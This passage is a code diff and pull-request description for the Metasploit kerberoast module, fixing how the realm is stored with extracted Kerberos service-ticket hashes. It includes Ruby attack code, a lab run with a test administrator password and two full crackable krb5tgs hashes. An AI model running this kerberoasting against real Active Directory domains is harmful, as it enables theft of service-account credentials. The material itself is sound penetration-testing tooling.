-    count = run_ldap_query(filter, attributes) do |result|
-      if result.respond_to?(:serviceprincipalname)
-        spn = result.serviceprincipalname[0]
-      end
+    realm = user_object = nil
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      realm = adds_get_domain_info(ldap)[:dns_name]
+      user_object = adds_get_object_by_samaccountname(ldap, user)
     end
-    if count == 0
+
+    if user_object.nil?
       fail_with(Failure::BadConfig, "User #{user} not found")
-    elsif spn.nil?
+    elsif user_object[:serviceprincipalname].nil?
       fail_with(Failure::BadConfig, "User #{user} has no SPN")
     end
     begin
-      jtr = roast(user, spn)
+      jtr = roast(user, user_object[:serviceprincipalname].first, realm: realm)
       jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
-      report_hash(jtr, jtr_format)
+      report_hash(jtr, jtr_format, realm: realm)
       print_good("Success: \n#{jtr}")
     rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
       print_error("#{user} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
@@ -113,17 +114,24 @@ class MetasploitModule < Msf::Auxiliary
     verify_options
     jtr_formats = Set.new
     hashes = []
-    run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
-      spn = result.serviceprincipalname[0]
-      username = result.samaccountname[0]
-      begin
-        jtr = roast(username, spn)
-        hashes.append(jtr)
-        jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
-        jtr_formats.add(jtr_format)
-        report_hash(jtr, jtr_format)
-      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
-        print_error("#{username} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+
+    realm = nil
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      realm = adds_get_domain_info(ldap)[:dns_name]
+
+      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
+        spn = result.serviceprincipalname[0]
+        username = result.samaccountname[0]
+        begin
+          jtr = roast(username, spn, realm: realm)
+          hashes.append(jtr)
+          jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
+          jtr_formats.add(jtr_format)
+          report_hash(jtr, jtr_format, realm: realm)
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+          print_error("#{username} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+        end
       end
     end
     if hashes.empty?
@@ -135,14 +143,14 @@ class MetasploitModule < Msf::Auxiliary
 
     if jtr_formats.length > 1
       print_warning('NOTE: Multiple encryption types returned - will require separate cracking runs for each type.')
-      print_status('To obtain the crackable values for a praticular type, run `creds`:')
+      print_status('To obtain the crackable values for a particular type, run `creds`:')
       jtr_formats.each do |format|
         print_status("creds -t #{format} -O #{datastore['RHOST']} -o <outfile.(jtr|hcat)>")
       end
     end
   end
 
-  def roast(roasted, spn)
+  def roast(roasted, spn, realm:)
     components = spn.split('/')
     fail_with(Failure::UnexpectedReply, "Invalid SPN: #{spn}") unless components.length == 2
 
@@ -150,16 +158,14 @@ class MetasploitModule < Msf::Auxiliary
       name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
       name_string: components
     )
-    # If we have a session set, we can use the login and domain information from it.
-    # But we need to let the user specify the KDC, as it might not be the Rhost the session is connected to
-    domain_name = session ? session.client.realm : datastore['LDAPDomain']
+
     rhostname = datastore['DomainControllerRhost']
     rhostname ||= session.client.peerhost if session
     username = session ? session.client.username : datastore['LDAPUsername']
     password = session ? session.client.password : datastore['LDAPPassword']
     authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(
       host: rhostname,
-      realm: domain_name,
+      realm: realm,
       username: username,
       password: password,
       framework: framework,
@@ -189,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
     tgs_ticket, = authenticator.request_service_ticket(
       session_key,
       ticket,
-      domain_name.upcase,
+      realm.upcase,
       username,
       offered_etypes,
       expiry_time,
@@ -201,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
     format_tgs_rep_to_john_hash(tgs_ticket, roasted)
   end
 
-  def report_hash(hash, jtr_format)
+  def report_hash(hash, jtr_format, realm:)
     service_data = {
       address: rhost,
       port: rport,
@@ -216,7 +222,7 @@ class MetasploitModule < Msf::Auxiliary
       private_type: :nonreplayable_hash,
       jtr_format: jtr_format,
       realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-      realm_value: session ? session.client.realm : datastore['LDAPDomain']
+      realm_value: realm
     }.merge(service_data)
 
     credential_core = create_credential(credential_data)

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -214,7 +214,9 @@ class MetasploitModule < Msf::Auxiliary
       origin_type: :service,
       private_data: hash,
       private_type: :nonreplayable_hash,
-      jtr_format: jtr_format
+      jtr_format: jtr_format,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: session ? session.client.realm : datastore['LDAPDomain']
     }.merge(service_data)
 
     credential_core = create_credential(credential_data)

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -159,12 +159,12 @@ class MetasploitModule < Msf::Auxiliary
       name_string: components
     )
 
-    rhostname = datastore['DomainControllerRhost']
-    rhostname ||= session.client.peerhost if session
+    dc_rhost = datastore['DomainControllerRhost']
+    dc_rhost ||= session.client.peerhost if session
     username = session ? session.client.username : datastore['LDAPUsername']
     password = session ? session.client.password : datastore['LDAPPassword']
     authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(
-      host: rhostname,
+      host: dc_rhost,
       realm: realm,
       username: username,
       password: password,
@@ -208,10 +208,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def report_hash(hash, jtr_format, realm:)
+    dc_rhost = datastore['DomainControllerRhost']
+    dc_rhost ||= session.client.peerhost if session
+
     service_data = {
-      address: rhost,
-      port: rport,
-      service_name: 'Kerberos',
+      address: dc_rhost,
+      port: 88,
+      service_name: 'kerberos',
       protocol: 'tcp',
       workspace_id: myworkspace_id
     }

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Auxiliary
       validate_bind_success!(ldap)
       realm = adds_get_domain_info(ldap)[:dns_name]
 
-      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
+      run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST', ldap: ldap) do |result|
         spn = result.serviceprincipalname[0]
         username = result.samaccountname[0]
         begin


### PR DESCRIPTION
This PR addresses sub-issues number 1 and 3 which were raised in issue: Kerberoast Improvements #20871

1. Fixes the kerberoast module which was not properly storing the realm value in the database for hashes found when running the module. Now the realm value is successfully stored along side the rest of the hash's attributes. 

2. Not fixed in this PR  - for context this sub-issue was handled by h00die in PR #20881

3. Updates the kerberoasting.md documentation. These docs were written before the kerberoast module existed and instructed users to use a combination of impacket dependent modules, the kiwi extension and the hashcat binary outside of msfconsole. This workflow can be executed from entirely within metasploit and the docs now reflect that capability. 

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use gather/kerberoast`
- [x] Provide LDAP session or RHOST credentials
- [x] Run module
- [x] Run the `creds` command
- [x] Verify the realm has been properly stored in the database
- [x] Verify the new documentation accurate describes the steps to recover plaintext passwords via kerberoasting


## Testing
```
msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id  host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
--  ----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf auxiliary(gather/kerberoast) > options

Module options (auxiliary/gather/kerberoast):

   Name                   Current Setting     Required  Description
   ----                   ---------------     --------  -----------
   DomainControllerRhost  172.16.199.200      no        The resolvable rhost for the Domain Controller
   Rhostname              dc2.kerberos.issue  no        The domain controller's hostname
   SSL                    false               no        Enable SSL on the LDAP connection
   TARGET_USER                                no        Specific user to kerberoast
   Timeout                10                  yes       The TCP timeout to establish Kerberos connection and read data


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LDAPDomain    kerberos.issue   no        The domain to authenticate to
   LDAPPassword  N0tpassword!     no        The password to authenticate with
   LDAPUsername  administrator    no        The username to authenticate with
   RHOSTS        172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         389              no        The target port


View the full module info with the info, or info -d command.

msf auxiliary(gather/kerberoast) > run
[*] Running module against 172.16.199.200

[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE administrator@KERBEROS.ISSUE
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:389 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260512103413_default_172.16.199.200_mit.kerberos.cca_812326.bin
[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE administrator@KERBEROS.ISSUE
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:389 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260512103413_default_172.16.199.200_mit.kerberos.cca_282257.bin

[+] Query returned 2 results.
[+] Success:
$krb5tgs$23$*user1$KERBEROS.ISSUE$http/dc2.kerberos.issue*$9f9ee05d43e534c2a133530115aacda1$3cc43e5234c1001f5279a33f439f3a336db79ca624ba8afa4d1a4e5bd64b042a6f6e7db3ed7f5e86df89e7f2fb0e84394bf9e9701d3c2532a8a40d91e1129daa7effca1c642c3ce2a75642d03d56f4a7b533e6be96504ed410632d6fb4fd10d5b63e2bdb2d1c852e1572eabd5191ee696717c4561f7afc6b5f12a1623c9430b9b0d109541aa2de40aef3850f14c1880a8a133b852111e41e28cb69f96bb8292ebb946bd59effe5c40dcad10ba12a97308c680603c1da7bd1031cf00ec1a26833036d25416ef39c338f907432337ae4cf24c6574a7e9ebb7b73b739142b01abab8089aeb7d67124b2738c38015dcdde08a400d575aabc76d7426e9132b0a11929345be17d75e5f90709bcc03739ad55e15ffe7b7576993f07c66e38d62ad61badf7b388596431c783db6b1fdae9fb04bb4b28c4894b8e968cf6a869e38fbc7364ede0470801c3a539a138c12514fd17395b4ae4e8227517d9a034522f661aa34f2cbfd6f774a032a514202383449aeea037ca95956969eb2b14bc6c0765620ce81a38d2d1a4e006d8276bfa724127fb662fd74be668ec4bfc4f2537b3b140741f0cd8f450c1d3634340aed1891da3c5e20ab1ef6edfca374abda22f782e77c39195b11075177bb41a372dc0930613b6c3d861b026d4f8951f8ed68fc53b582a3e0a09f272d97bf5d5286ab682c5beca133eec693b3139b91428d800efdba38d3107c1ab2401407012fff09908b57c54db4c0df62ecfc1e0732991d7d03cfdf44db4ad8e1c615cbb02f167edc36f6ba4a525d09046cf23f4de18b5156f0362d2d16aceffb74c3ddf436189c1f683aff649827f67ee5e0ba7402242edb5c40cf882d24d06ac171e2aacecd646e9df35419292fa3d51f081fdfee833947abfc0f6547b6cb899b21dd00e42c07d58a738f90cd25771afbc596483d885abc6bb9974f733930b944df527e72a5e36f05c78fa8726e9afbe40e2fc3298b0ff8ce5e3761c2105449afce18c7a8c6e69c40999e4458540242c168e006812a3fc8c446f06f4991c8d64f7feb89ed9dfe5928d4916ecfb6855df83a1084f1945943664aa0891e8fe99b07dab6d273147624a394c2feb0d3b04a69a7c7fc8434ce179c152fb8e1f58c8337c89b8831d8275eeb4e9043dc63b101306244ed842aab6a4f41d52a873537d578b32e29d85ffc1875fbec0cd0d22b1ac3becf7c4ca27fdc992ace623cde8012139252e94da4bebeb0deb90b58238d6ebc004d6f69bdcfd56e372766420d6825cb76be4e5424e63693d5f9c972c1d260c0372815e19971b2c8f43bc3c6c3b61054483ce204375a7cecbe74f1888eff424f9adfe2f349b8344c2c5891c871b985c9be780d9cfdaa1c408b8527c073a19e0ce6ceadfe075f531216b818fa908989804c14dbf7da19e3a09e4c2e86a13c22bf540ef23bc2898936f330686c1164d3acecbc8335dc61984369537799efccc1d52d76d47ceb1b49a1845dedfdad24a1851a66ed07b580e6754c98f824fc1d7f9f369f13ea26113a538516806cd4becf386b1aa0770ed0d46fc2368ea53d6fbe4b7ee498a0493927bf3f4ed59a0f98ce95ce0a766a788b22605f9f66883e6fea57a35979c8b53b0514d7cc1edf462915cc8df2b7969536f0e2db8a1163b9bc26d255d0d98cbcc48bb5ff9dd141cc1754a
$krb5tgs$23$*svc_kerberoastable$KERBEROS.ISSUE$DC2/svc_kerberoastable.KERBEROS.ISSUE:1337*$066904f1d6ff78e1888eae25cf71c9ec$9ef73c115972c113c38955cc3fc77e35b6622397a642d300bfbc03014cca47b445b1b384c1231ec5178798e9385d3941896b543049838d9ca5df42c32be97f1407d74feb834b82f59643427f3e0b6486f04f1848a6d63a3f055959c5ab67536a8fd0160f8fe5c1395f26ccfb398d689e368b40b67e688f1acf96de1089927770f6e3763722a62545dff72b12c0d96aa65113bbfbf181ef2ee23c9b43ba69894375ea7965b272e1bd56dbc01e28fd28d33ac8512da718235c3a27dbe861d0fd45d40cbbd4c720184881c91d199104061dc73c905be829a819627c35b503f92fad6766fea497c3ade6a4043d9369fd4f234ce9030326069a2dd6eaaf81fa23f7e2e7410533670d6f4a131dd3837ef7ff3b4e44369354559979bfda4294ad5fa318a1011a72ba8c2caf896858bbfe84cb080efa5afeadd5e2ae14ae722c536baf0b6046fbcaca2bcea2ff4bcb14c2a54c91e6a8811f8be750a7207580440b9f6d5e12ffb7a24e1853191f1c83de258944097201e0d3de2269394358059a00d6a2f182044bff3ad64763a34bb8afeb9759cd36dfc3e60918859090ba7927e1660b0d9c0fb6c30444f08b7a88281124a384483125de45041499385b4e1d8d67b3b92d1ff5774122f95b2e6f0c7afd61957225754e2809619282c10d45524af2d45654071cd18f11e32a632fec5fb5df7aeb01b72f6f976d6f1ba71dff398daef349fa39e90bf4735d7215dcb21118e6d9fc03a2ddeb1c8a895d6d2a961b4435342a47b2cd1da408738f4e736fb4c3254f1bce989a961ba845ed318922e07997225463b6b692c92609b11cf6e96e8a05a0f8253510a6542ca052a9c95669a45eb3c2e22a354cd403723158881ad1a63f5dcc9ce519ba7017607f8f3642d2cd67452b6aad8c53cfb05adb1dc80e20817cdfaf0393627d5b924dff93fc432f3a3c8e9afca9b1a969f1cb707895f1d3f66d17f24731a54eebbeff3dc083d6c5b3b602f647d65e1767832e1f6236f451035c6f73af6cc06a5fd8809cb12f9b9425da5cb8c66dc3bdf4320473444bbaad454dd18f2f851871279c987f874d436c2eb7008ee89ef34d42a5508b7e2a5c493d65c938a6769189c79b853a3604f39893c323430735db687023fb7a8f06d1e48237d110bc477bb5c8e15dfa6ad5a9c43121776c7cd89880f4bb2bd780b0fbdff3d0ccb40c470a14390718d8e0d490f68ddb1dff6d9f60aedc98cf77da2732a3ded7cda8e5b168821559057a3176541e9ed931d6674a39e15947ca8d6198d61b831710144b0d6b8c441a42878fdf464f8682c2d554413c0ccb738c433ebb33272c47b479edf6aa28db14822150c8f4f0dc45481b0b02e582431eb9ee451842321f9d1eccdb662e9dd3cd91fb3024452567b6037f7bac5c00ada319c1fefc29fbe4f3283304cb3b13b25c7eccfd61ec09663179d3bd8f444101f023c789d11f9674f31cc0f5c865af0ce5bc158adc957071729da59a303b509c4cf3eff33b6fa433d49804fc690f6b837deb17b38bc6f247e920c8a17244f566b47684bfa77b0ee03f0eb03e29d802fd32573d03e1f907887c409178aa6f50ab1d8381127c317116deb7dc9101f774a13d4e0c423f9a28c551f2bae232aefba057905caa3ba6090e67f2d709a986cc1c6dd742fba267d6a97e86c480551d1c48
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========

id  host            origin          service             public  private                                                                                   realm           private_type        JtR Format   cracked_password
--  ----            ------          -------             ------  -------                                                                                   -----           ------------        ----------   ----------------
19  172.16.199.200  172.16.199.200  389/tcp (Kerberos)          $krb5tgs$23$*user1$KERBEROS.ISSUE$http/dc2.kerberos.issue*$9f9ee05d43e534c2a (TRUNCATED)  kerberos.issue  Nonreplayable hash  krb5tgs-rc4
20  172.16.199.200  172.16.199.200  389/tcp (Kerberos)          $krb5tgs$23$*svc_kerberoastable$KERBEROS.ISSUE$DC2/svc_kerberoastable.KERBER (TRUNCATED)  kerberos.issue  Nonreplayable hash  krb5tgs-rc4

```